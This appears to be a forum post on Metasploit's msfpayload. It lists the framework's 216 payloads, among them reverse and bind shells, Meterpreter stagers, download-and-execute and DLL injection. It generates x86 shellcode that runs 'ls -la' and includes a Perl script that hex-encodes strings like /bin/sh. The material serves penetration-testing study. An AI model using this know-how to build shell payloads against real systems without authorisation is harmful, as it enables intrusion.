It looks like you're new here. If you want to get involved, click one of these buttons!
/opt/metasploit3/bin
./msfpayload <payload> <options> <language>
Usage: /opt/metasploit3/msf3/msfpayload <payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]avascript|e[X]ecutable|[D]ll|[V]BA|[W]ar>
Framework Payloads (216 total)
==============================
Name Description
---- -----------
aix/ppc/shell_bind_tcp Listen for a connection and spawn a command shell
aix/ppc/shell_find_port Spawn a shell on an established connection
aix/ppc/shell_interact Simply execve /bin/sh (for inetd programs)
aix/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell
bsd/sparc/shell_bind_tcp Listen for a connection and spawn a command shell
bsd/sparc/shell_reverse_tcp Connect back to attacker and spawn a command shell
bsd/x86/exec Execute an arbitrary command
bsd/x86/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service
bsd/x86/metsvc_reverse_tcp Stub payload for interacting with a Meterpreter Service
bsd/x86/shell/bind_tcp Listen for a connection, Spawn a command shell (staged)
bsd/x86/shell/find_tag Use an established connection, Spawn a command shell (staged)
bsd/x86/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged)
bsd/x86/shell_bind_tcp Listen for a connection and spawn a command shell
bsd/x86/shell_find_port Spawn a shell on an established connection
bsd/x86/shell_find_tag Spawn a shell on an established connection (proxy/nat safe)
bsd/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell
bsdi/x86/shell/bind_tcp Listen for a connection, Spawn a command shell (staged)
bsdi/x86/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged)
bsdi/x86/shell_bind_tcp Listen for a connection and spawn a command shell
bsdi/x86/shell_find_port Spawn a shell on an established connection
bsdi/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell
cmd/unix/bind_inetd Listen for a connection and spawn a command shell (persistent)
cmd/unix/bind_netcat Listen for a connection and spawn a command shell via netcat
cmd/unix/bind_perl Listen for a connection and spawn a command shell via perl
cmd/unix/bind_ruby Continually listen for a connection and spawn a command shell via Ruby
cmd/unix/generic Executes the supplied command
cmd/unix/interact Interacts with a shell on an established socket connection
cmd/unix/reverse Creates an interactive shell through two inbound connections
cmd/unix/reverse_bash
Creates an interactive shell via bash's builtin /dev/tcp.
This will not work on most Debian-based Linux distributions
(including Ubuntu) because they compile bash without the
/dev/tcp feature.
cmd/unix/reverse_netcat Creates an interactive shell via netcat
cmd/unix/reverse_perl Creates an interactive shell via perl
cmd/unix/reverse_ruby Connect back and create a command shell via Ruby
cmd/windows/adduser Create a new user and add them to local administration group
cmd/windows/bind_perl Listen for a connection and spawn a command shell via perl (persistent)
cmd/windows/bind_ruby Continually listen for a connection and spawn a command shell via Ruby
cmd/windows/download_exec_vbs Download an EXE from an HTTP(S) URL and execute it
cmd/windows/reverse_perl Creates an interactive shell via perl
cmd/windows/reverse_ruby Connect back and create a command shell via Ruby
generic/debug_trap Generate a debug trap in the target process
generic/shell_bind_tcp Listen for a connection and spawn a command shell
generic/shell_reverse_tcp Connect back to attacker and spawn a command shell
generic/tight_loop Generate a tight loop in the target process
java/jsp_shell_bind_tcp Listen for a connection and spawn a command shell
java/jsp_shell_reverse_tcp Connect back to attacker and spawn a command shell
java/meterpreter/bind_tcp Listen for a connection, Run a meterpreter server in Java
java/meterpreter/reverse_tcp Connect back stager, Run a meterpreter server in Java
java/shell/bind_tcp Listen for a connection, Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else)
java/shell/reverse_tcp Connect back stager, Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else)
linux/armle/exec Execute an arbitrary command
linux/armle/shell_reverse_tcp Connect back to attacker and spawn a command shell
linux/mipsbe/shell_reverse_tcp Connect back to attacker and spawn a command shell
linux/mipsle/shell_reverse_tcp Connect back to attacker and spawn a command shell
linux/ppc/shell_bind_tcp Listen for a connection and spawn a command shell
linux/ppc/shell_find_port Spawn a shell on an established connection
linux/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell
linux/ppc64/shell_bind_tcp Listen for a connection and spawn a command shell
linux/ppc64/shell_find_port Spawn a shell on an established connection
linux/ppc64/shell_reverse_tcp Connect back to attacker and spawn a command shell
linux/x86/adduser Create a new user with UID 0
linux/x86/chmod Runs chmod on specified file with specified mode
linux/x86/exec Execute an arbitrary command
linux/x86/meterpreter/bind_ipv6_tcp Listen for a connection over IPv6, Staged meterpreter server
linux/x86/meterpreter/bind_tcp Listen for a connection, Staged meterpreter server
linux/x86/meterpreter/find_tag Use an established connection, Staged meterpreter server
linux/x86/meterpreter/reverse_ipv6_tcp Connect back to attacker over IPv6, Staged meterpreter server
linux/x86/meterpreter/reverse_tcp Connect back to the attacker, Staged meterpreter server
linux/x86/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service
linux/x86/metsvc_reverse_tcp Stub payload for interacting with a Meterpreter Service
linux/x86/shell/bind_ipv6_tcp Listen for a connection over IPv6, Spawn a command shell (staged)
linux/x86/shell/bind_tcp Listen for a connection, Spawn a command shell (staged)
linux/x86/shell/find_tag Use an established connection, Spawn a command shell (staged)
linux/x86/shell/reverse_ipv6_tcp Connect back to attacker over IPv6, Spawn a command shell (staged)
linux/x86/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged)
linux/x86/shell_bind_ipv6_tcp Listen for a connection over IPv6 and spawn a command shell
linux/x86/shell_bind_tcp Listen for a connection and spawn a command shell
linux/x86/shell_find_port Spawn a shell on an established connection
linux/x86/shell_find_tag Spawn a shell on an established connection (proxy/nat safe)
linux/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell
linux/x86/shell_reverse_tcp2 Connect back to attacker and spawn a command shell
netware/shell/reverse_tcp Connect back to the attacker, Connect to the NetWare console (staged)
osx/armle/execute/bind_tcp Listen for a connection, Spawn a command shell (staged)
osx/armle/execute/reverse_tcp Connect back to the attacker, Spawn a command shell (staged)
osx/armle/shell/bind_tcp Listen for a connection, Spawn a command shell (staged)
osx/armle/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged)
osx/armle/shell_bind_tcp Listen for a connection and spawn a command shell
osx/armle/shell_reverse_tcp Connect back to attacker and spawn a command shell
osx/armle/vibrate
Causes the iPhone to vibrate, only works when the AudioToolkit library has been loaded.
Based on work by Charlie Miller <cmiller[at]securityevaluators.com>.
osx/ppc/shell/bind_tcp Listen for a connection, Spawn a command shell (staged)
osx/ppc/shell/find_tag Use an established connection, Spawn a command shell (staged)
osx/ppc/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged)
osx/ppc/shell_bind_tcp Listen for a connection and spawn a command shell
osx/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell
osx/x86/bundleinject/bind_tcp Listen, read length, read buffer, execute, Inject a custom Mach-O bundle into the exploited process
osx/x86/bundleinject/reverse_tcp Connect, read length, read buffer, execute, Inject a custom Mach-O bundle into the exploited process
osx/x86/exec Execute an arbitrary command
osx/x86/isight/bind_tcp Listen, read length, read buffer, execute, Inject a Mach-O bundle to capture a photo from the iSight (staged)
osx/x86/isight/reverse_tcp Connect, read length, read buffer, execute, Inject a Mach-O bundle to capture a photo from the iSight (staged)
osx/x86/shell_bind_tcp Listen for a connection and spawn a command shell
osx/x86/shell_find_port Spawn a shell on an established connection
osx/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell
osx/x86/vforkshell/bind_tcp Listen, read length, read buffer, execute, Call vfork() if necessary and spawn a command shell (staged)
osx/x86/vforkshell/reverse_tcp Connect, read length, read buffer, execute, Call vfork() if necessary and spawn a command shell (staged)
osx/x86/vforkshell_bind_tcp Listen for a connection, vfork if necessary, and spawn a command shell
osx/x86/vforkshell_reverse_tcp Connect back to attacker, vfork if necessary, and spawn a command shell
php/bind_perl Listen for a connection and spawn a command shell via perl (persistent)
php/bind_php Listen for a connection and spawn a command shell via php
php/download_exec Download an EXE from an HTTP URL and execute it
php/exec Execute a single system command
php/meterpreter/bind_tcp Listen for a connection, Run a meterpreter server in PHP
php/meterpreter/reverse_tcp Reverse PHP connect back stager with checks for disabled functions, Run a meterpreter server in PHP
php/meterpreter_reverse_tcp Connect back to attacker and spawn a Meterpreter server (PHP)
php/reverse_perl Creates an interactive shell via perl
php/reverse_php Reverse PHP connect back shell with checks for disabled functions
php/shell_findsock
Spawn a shell on the established connection to
the webserver. Unfortunately, this payload
can leave conspicuous evil-looking entries in the
apache error logs, so it is probably a good idea
to use a bind or reverse shell unless firewalls
prevent them from working. The issue this
payload takes advantage of (CLOEXEC flag not set
on sockets) appears to have been patched on the
Ubuntu version of Apache and may not work on
other Debian-based distributions. Only tested on
Apache but it might work on other web servers
that leak file descriptors to child processes.
solaris/sparc/shell_bind_tcp Listen for a connection and spawn a command shell
solaris/sparc/shell_find_port Spawn a shell on an established connection
solaris/sparc/shell_reverse_tcp Connect back to attacker and spawn a command shell
solaris/x86/shell_bind_tcp Listen for a connection and spawn a command shell
solaris/x86/shell_find_port Spawn a shell on an established connection
solaris/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell
tty/unix/interact Interacts with a TTY on an established socket connection
windows/adduser Create a new user and add them to local administration group
windows/dllinject/bind_ipv6_tcp Listen for a connection over IPv6, Inject a Dll via a reflective loader
windows/dllinject/bind_nonx_tcp Listen for a connection (No NX), Inject a Dll via a reflective loader
windows/dllinject/bind_tcp Listen for a connection, Inject a Dll via a reflective loader
windows/dllinject/find_tag Use an established connection, Inject a Dll via a reflective loader
windows/dllinject/reverse_http Tunnel communication over HTTP using IE 6, Inject a Dll via a reflective loader
windows/dllinject/reverse_ipv6_tcp Connect back to the attacker over IPv6, Inject a Dll via a reflective loader
windows/dllinject/reverse_nonx_tcp Connect back to the attacker (No NX), Inject a Dll via a reflective loader
windows/dllinject/reverse_ord_tcp Connect back to the attacker, Inject a Dll via a reflective loader
windows/dllinject/reverse_tcp Connect back to the attacker, Inject a Dll via a reflective loader
windows/dllinject/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject a Dll via a reflective loader
windows/dllinject/reverse_tcp_dns Connect back to the attacker, Inject a Dll via a reflective loader
windows/download_exec Download an EXE from an HTTP URL and execute it
windows/exec Execute an arbitrary command
windows/messagebox Spawns a dialog via MessageBox using a customizable title, text & icon
windows/meterpreter/bind_ipv6_tcp Listen for a connection over IPv6, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/bind_nonx_tcp Listen for a connection (No NX), Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/bind_tcp Listen for a connection, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/find_tag Use an established connection, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/reverse_http Tunnel communication over HTTP using IE 6, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/reverse_https Tunnel communication over HTTP using SSL, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/reverse_ipv6_tcp Connect back to the attacker over IPv6, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/reverse_nonx_tcp Connect back to the attacker (No NX), Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/reverse_ord_tcp Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/reverse_tcp Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/reverse_tcp_dns Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service
windows/metsvc_reverse_tcp Stub payload for interacting with a Meterpreter Service
windows/patchupdllinject/bind_ipv6_tcp Listen for a connection over IPv6, Inject a custom DLL into the exploited process
windows/patchupdllinject/bind_nonx_tcp Listen for a connection (No NX), Inject a custom DLL into the exploited process
windows/patchupdllinject/bind_tcp Listen for a connection, Inject a custom DLL into the exploited process
windows/patchupdllinject/find_tag Use an established connection, Inject a custom DLL into the exploited process
windows/patchupdllinject/reverse_ipv6_tcp Connect back to the attacker over IPv6, Inject a custom DLL into the exploited process
windows/patchupdllinject/reverse_nonx_tcp Connect back to the attacker (No NX), Inject a custom DLL into the exploited process
windows/patchupdllinject/reverse_ord_tcp Connect back to the attacker, Inject a custom DLL into the exploited process
windows/patchupdllinject/reverse_tcp Connect back to the attacker, Inject a custom DLL into the exploited process
windows/patchupdllinject/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject a custom DLL into the exploited process
windows/patchupdllinject/reverse_tcp_dns Connect back to the attacker, Inject a custom DLL into the exploited process
windows/patchupmeterpreter/bind_ipv6_tcp Listen for a connection over IPv6, Inject the meterpreter server DLL (staged)
windows/patchupmeterpreter/bind_nonx_tcp Listen for a connection (No NX), Inject the meterpreter server DLL (staged)
windows/patchupmeterpreter/bind_tcp Listen for a connection, Inject the meterpreter server DLL (staged)
windows/patchupmeterpreter/find_tag Use an established connection, Inject the meterpreter server DLL (staged)
windows/patchupmeterpreter/reverse_ipv6_tcp Connect back to the attacker over IPv6, Inject the meterpreter server DLL (staged)
windows/patchupmeterpreter/reverse_nonx_tcp Connect back to the attacker (No NX), Inject the meterpreter server DLL (staged)
windows/patchupmeterpreter/reverse_ord_tcp Connect back to the attacker, Inject the meterpreter server DLL (staged)
windows/patchupmeterpreter/reverse_tcp Connect back to the attacker, Inject the meterpreter server DLL (staged)
windows/patchupmeterpreter/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject the meterpreter server DLL (staged)
windows/patchupmeterpreter/reverse_tcp_dns Connect back to the attacker, Inject the meterpreter server DLL (staged)
windows/shell/bind_ipv6_tcp Listen for a connection over IPv6, Spawn a piped command shell (staged)
windows/shell/bind_nonx_tcp Listen for a connection (No NX), Spawn a piped command shell (staged)
windows/shell/bind_tcp Listen for a connection, Spawn a piped command shell (staged)
windows/shell/find_tag Use an established connection, Spawn a piped command shell (staged)
windows/shell/reverse_http Tunnel communication over HTTP using IE 6, Spawn a piped command shell (staged)
windows/shell/reverse_ipv6_tcp Connect back to the attacker over IPv6, Spawn a piped command shell (staged)
windows/shell/reverse_nonx_tcp Connect back to the attacker (No NX), Spawn a piped command shell (staged)
windows/shell/reverse_ord_tcp Connect back to the attacker, Spawn a piped command shell (staged)
windows/shell/reverse_tcp Connect back to the attacker, Spawn a piped command shell (staged)
windows/shell/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Spawn a piped command shell (staged)
windows/shell/reverse_tcp_dns Connect back to the attacker, Spawn a piped command shell (staged)
windows/shell_bind_tcp Listen for a connection and spawn a command shell
windows/shell_bind_tcp_xpfw Disable the Windows ICF, then listen for a connection and spawn a command shell
windows/shell_reverse_tcp Connect back to attacker and spawn a command shell
windows/speak_pwned Causes the target to say \"You Got Pwned\" via the Windows Speech API
windows/upexec/bind_ipv6_tcp Listen for a connection over IPv6, Uploads an executable and runs it (staged)
windows/upexec/bind_nonx_tcp Listen for a connection (No NX), Uploads an executable and runs it (staged)
windows/upexec/bind_tcp Listen for a connection, Uploads an executable and runs it (staged)
windows/upexec/find_tag Use an established connection, Uploads an executable and runs it (staged)
windows/upexec/reverse_http Tunnel communication over HTTP using IE 6, Uploads an executable and runs it (staged)
windows/upexec/reverse_ipv6_tcp Connect back to the attacker over IPv6, Uploads an executable and runs it (staged)
windows/upexec/reverse_nonx_tcp Connect back to the attacker (No NX), Uploads an executable and runs it (staged)
windows/upexec/reverse_ord_tcp Connect back to the attacker, Uploads an executable and runs it (staged)
windows/upexec/reverse_tcp Connect back to the attacker, Uploads an executable and runs it (staged)
windows/upexec/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Uploads an executable and runs it (staged)
windows/upexec/reverse_tcp_dns Connect back to the attacker, Uploads an executable and runs it (staged)
windows/vncinject/bind_ipv6_tcp Listen for a connection over IPv6, Inject a VNC Dll via a reflective loader (staged)
windows/vncinject/bind_nonx_tcp Listen for a connection (No NX), Inject a VNC Dll via a reflective loader (staged)
windows/vncinject/bind_tcp Listen for a connection, Inject a VNC Dll via a reflective loader (staged)
windows/vncinject/find_tag Use an established connection, Inject a VNC Dll via a reflective loader (staged)
windows/vncinject/reverse_http Tunnel communication over HTTP using IE 6, Inject a VNC Dll via a reflective loader (staged)
windows/vncinject/reverse_ipv6_tcp Connect back to the attacker over IPv6, Inject a VNC Dll via a reflective loader (staged)
windows/vncinject/reverse_nonx_tcp Connect back to the attacker (No NX), Inject a VNC Dll via a reflective loader (staged)
windows/vncinject/reverse_ord_tcp Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged)
windows/vncinject/reverse_tcp Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged)
windows/vncinject/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject a VNC Dll via a reflective loader (staged)
windows/vncinject/reverse_tcp_dns Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged)
windows/x64/exec Execute an arbitrary command (Windows x64)
windows/x64/meterpreter/bind_tcp Listen for a connection (Windows x64), Inject the meterpreter server DLL via the Reflective Dll Injection payload (Windows x64) (staged)
windows/x64/meterpreter/reverse_tcp Connect back to the attacker (Windows x64), Inject the meterpreter server DLL via the Reflective Dll Injection payload (Windows x64) (staged)
windows/x64/shell/bind_tcp Listen for a connection (Windows x64), Spawn a piped command shell (Windows x64) (staged)
windows/x64/shell/reverse_tcp Connect back to the attacker (Windows x64), Spawn a piped command shell (Windows x64) (staged)
windows/x64/shell_bind_tcp Listen for a connection and spawn a command shell (Windows x64)
windows/x64/shell_reverse_tcp Connect back to attacker and spawn a command shell (Windows x64)
windows/x64/vncinject/bind_tcp Listen for a connection (Windows x64), Inject a VNC Dll via a reflective loader (Windows x64) (staged)
windows/x64/vncinject/reverse_tcp Connect back to the attacker (Windows x64), Inject a VNC Dll via a reflective loader (Windows x64) (staged)
linux/x86/exec
./msfpayload linux/x86/exec CMD=\"ls -la\" C
/*
* linux/x86/exec - 42 bytes
* http://www.metasploit.com
* PrependSetresuid=false, PrependSetreuid=false,
* PrependSetuid=false, PrependChrootBreak=false,
* AppendExit=false, CMD=ls -la
*/
unsigned char buf[] =
\"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\"
\"\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x07\x00\x00\x00\x6c\"
\"\x73\x20\x2d\x6c\x61\x00\x57\x53\x89\xe1\xcd\x80\";
#!/usr/bin/perl
# shellcode generator
print \"shellcode: \";
$x1=<>;
my $data = \"$x1\";
chomp($data);
my @values = split(undef,$data);
foreach my $val (@values) {
chomp($val);
print '\x';
print unpack(H8,\"$val\");
}
print \"\n\";
exit 0;
perl shellcode.pl
chronic@vandal:~$ perl shellcode.pl
shellcode: /bin/sh
\x2f\x62\x69\x6e\x2f\x73\x68